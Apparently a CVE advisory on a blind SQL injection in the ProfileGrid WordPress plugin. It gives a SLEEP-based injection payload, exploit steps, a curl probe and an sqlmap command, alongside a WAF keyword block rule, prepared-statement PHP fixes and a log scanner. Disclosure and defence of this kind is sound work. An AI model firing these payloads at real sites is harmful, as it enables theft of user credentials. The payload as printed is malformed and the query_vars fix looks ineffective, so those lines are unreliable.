How the CVE Works:
The ProfileGrid plugin (≤ v5.9.4.7) for WordPress fails to sanitize user-supplied input in the `rid` and `search` parameters, enabling blind/time-based SQL injection. Attackers with Subscriber-level access can manipulate these parameters to inject malicious SQL payloads. Because the query is built by direct concatenation of unsanitized input rather than with prepared statements, the injected SQL is executed as part of the plugin's query, allowing an attacker to bypass authentication and exfiltrate database contents (e.g., user credentials, sensitive settings).
DailyCVE Form:
Platform: WordPress
Version: ≤5.9.4.7
Vulnerability: SQL Injection
Severity: Critical
Date: 03/26/2025
What Undercode Says:
Exploitation:
1. Payload Example:
GET /wp-content/plugins/profilegrid/?rid=1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))--
2. Exploit Steps:
- Authenticate as Subscriber.
- Intercept requests containing `rid`/`search`.
- Inject time-delay or boolean-based payloads.
Detection:
curl -I "http://target/wp-content/plugins/profilegrid/?rid=1%20AND%201=1"
Mitigation:
1. Patch: Upgrade to ProfileGrid >5.9.4.7.
2. WAF Rules:
# nginx: reject requests to the plugin path whose query string carries common SQL keywords
location ~ /profilegrid/ {
    if ($args ~* "(sleep|benchmark|union|select)") {
        return 403;
    }
}
3. PHP Hardening:
// Drop the two vulnerable parameters from the public query vars
add_filter('query_vars', function($vars) { return array_diff($vars, ['rid', 'search']); });
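The concatenation pattern the advisory describes, beside its hardened WordPress form, as an added example (this is illustrative code, not ProfileGrid's own source). The table name `pg_example_groups`, the column names and the `pg_example_*` function names are assumptions; `$wpdb->prepare()`, `absint()`, `sanitize_text_field()`, `wp_unslash()` and `$wpdb->esc_like()` are real WordPress core APIs, so the snippet runs inside a plugin or theme where `$wpdb` is available.

```php
<?php
// Added illustration, not ProfileGrid's code. The table and column names
// (pg_example_groups, gid, name) and the function names are assumptions.

// Vulnerable pattern: the request value is concatenated straight into the
// SQL text, so a value such as "1 AND (SELECT SLEEP(5))" changes the query
// structure instead of being treated as data. This is the defect class the
// advisory describes.
function pg_example_get_group_unsafe( $wpdb, $rid ) {
    $sql = "SELECT * FROM {$wpdb->prefix}pg_example_groups WHERE gid = " . $rid;
    return $wpdb->get_row( $sql );
}

// Hardened form for a numeric id: coerce to the expected type first, then
// bind through $wpdb->prepare() so the value can never alter the query.
function pg_example_get_group_safe( $wpdb, $rid ) {
    $rid = absint( $rid ); // non-numeric input collapses to 0 and is rejected
    if ( 0 === $rid ) {
        return null;
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}pg_example_groups WHERE gid = %d",
        $rid
    );
    return $wpdb->get_row( $sql );
}

// Hardened form for a free-text parameter such as `search`: sanitize, escape
// LIKE wildcards with esc_like(), then bind with %s. The wildcards are added
// after escaping so only the caller's own '%' characters act as wildcards.
function pg_example_search_safe( $wpdb, $search ) {
    $term = sanitize_text_field( wp_unslash( $search ) );
    if ( '' === $term ) {
        return [];
    }
    $like = '%' . $wpdb->esc_like( $term ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT gid, name FROM {$wpdb->prefix}pg_example_groups WHERE name LIKE %s",
        $like
    );
    return $wpdb->get_results( $sql );
}

// Typical call sites inside a request handler:
//   $group   = pg_example_get_group_safe( $wpdb, $_GET['rid'] ?? '' );
//   $matches = pg_example_search_safe( $wpdb, $_GET['search'] ?? '' );
```

The essential change is that `prepare()` separates the query text from the bound values, so the database never parses attacker input as SQL; type coercion with `absint()` is a second, independent line of defence for identifiers.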
Forensics:
- Check WordPress request logs for suspicious queries (wp_logs is not a core WordPress table; substitute the table your logging plugin writes to):
SELECT * FROM wp_logs WHERE request LIKE '%profilegrid%rid=%';
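A small retrospective check over web server access logs, as an added example that is not part of the advisory: it isolates requests to the plugin path, decodes the `rid` and `search` parameters, and flags values carrying SQL keywords or time-delay functions. The log lines are constructed for the example and the `pg_example_flag_requests` name is an assumption; it runs with the PHP CLI and needs no WordPress.

```php
<?php
// Added example: scan access-log lines for ProfileGrid requests whose `rid`
// or `search` parameter contains SQL keywords. Sample lines are constructed.

$sample_log = <<<'LOG'
203.0.113.10 - - [26/Mar/2025:10:01:02 +0000] "GET /wp-content/plugins/profilegrid/?rid=12 HTTP/1.1" 200 512
203.0.113.10 - - [26/Mar/2025:10:01:09 +0000] "GET /wp-content/plugins/profilegrid/?rid=1%20AND%20(SELECT%20SLEEP(5)) HTTP/1.1" 200 512
198.51.100.7 - - [26/Mar/2025:10:02:30 +0000] "GET /wp-content/plugins/profilegrid/?search=alice HTTP/1.1" 200 2048
198.51.100.7 - - [26/Mar/2025:10:02:41 +0000] "GET /wp-content/plugins/profilegrid/?search=a%27%20UNION%20SELECT%201-- HTTP/1.1" 200 2048
192.0.2.5 - - [26/Mar/2025:10:03:00 +0000] "GET /wp-content/plugins/other/?rid=1%20AND%20SLEEP(5) HTTP/1.1" 404 0
LOG;

// Returns one entry per flagged (line, parameter) pair.
function pg_example_flag_requests( string $log ): array {
    $flagged = [];
    // Keywords from the advisory's WAF rule plus a simple tautology shape.
    $pattern = '/\b(sleep|benchmark|union|select)\b|\bor\s+\d+\s*=\s*\d+/i';

    foreach ( preg_split( '/\R/', trim( $log ) ) as $line ) {
        // Pull the request target out of the quoted request line.
        if ( ! preg_match( '/"(?:GET|POST) (\S+) HTTP/', $line, $m ) ) {
            continue;
        }
        $url = $m[1];
        if ( strpos( $url, '/plugins/profilegrid/' ) === false ) {
            continue; // only the vulnerable plugin path is of interest
        }
        $query = parse_url( $url, PHP_URL_QUERY );
        if ( $query === null || $query === false ) {
            continue;
        }
        parse_str( $query, $params ); // decodes %xx sequences for us

        foreach ( [ 'rid', 'search' ] as $name ) {
            if ( isset( $params[ $name ] ) && is_string( $params[ $name ] )
                 && preg_match( $pattern, $params[ $name ] ) ) {
                $flagged[] = [
                    'param' => $name,
                    'value' => $params[ $name ],
                    'line'  => $line,
                ];
            }
        }
    }
    return $flagged;
}

foreach ( pg_example_flag_requests( $sample_log ) as $hit ) {
    printf( "[%s] %s\n    %s\n", $hit['param'], $hit['value'], $hit['line'] );
}
```

Decoding before matching matters: the payloads arrive percent-encoded, so a pattern applied to the raw URL would miss `%20`-separated keywords. On the constructed sample, only the second and fourth lines are reported; the request to a different plugin path is skipped on purpose, so widen the path check if other plugins are in scope.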
Tooling:
- SQLmap Command:
sqlmap -u "http://target/?rid=1" --level=3 --risk=3
- Metasploit Module:
use auxiliary/scanner/http/wp_profilegrid_sqli
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0723
Extra Source Hub:
Undercode